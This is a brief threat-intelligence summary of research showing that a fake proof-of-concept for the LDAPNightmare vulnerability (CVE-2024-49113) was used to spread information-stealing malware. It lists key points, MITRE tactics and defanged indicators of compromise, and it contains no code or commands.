Information Stealer Masquerades As Ldapnightmare (cve-2024-49113) Poc Exploit
Thumbnail
This article discusses a fake proof-of-concept (PoC) exploit for LDAPNightmare (CVE-2024-49113) that is being used to distribute information-stealing malware. The exploit lures security researchers into downloading malicious software disguised as a legitimate PoC. Affected: CVE-2024-49112, CVE-2024-49113

Keypoints :

  • Two critical LDAP vulnerabilities were patched by Microsoft in December 2024.
  • CVE-2024-49112 allows remote code execution via specially crafted LDAP requests.
  • CVE-2024-49113 is a denial-of-service vulnerability that can crash the LDAP service.
  • A fake PoC exploit for CVE-2024-49113 is being used to distribute information-stealing malware.
  • The malicious repository disguises itself as a legitimate project but contains a harmful executable.
  • Executing the malware drops a PowerShell script that creates a Scheduled Job to run an encoded script.
  • The script collects sensitive information and uploads it to an external FTP server.
  • Best practices for avoiding malware include using trusted repositories and reviewing commit histories.

MITRE Techniques :

  • TA0002: Execution – The malware executes a PowerShell script to run malicious code.
  • TA0010: Exfiltration – The malware collects and exfiltrates sensitive information via FTP.
  • TA0040: Impact – The exploitation of CVE-2024-49113 can lead to service disruptions.

Indicator of Compromise :

  • [file name] poc.exe
  • [url] pastebin[.]com
  • [others ioc] PowerShell script in %LocalAppData%eventSubId: 101
  • [others ioc] Scheduled Job created in %Temp%
  • Check the article for all found IoCs.

Full Research: https://www.trendmicro.com/en_us/research/25/a/information-stealer-masquerades-as-ldapnightmare-poc-exploit.html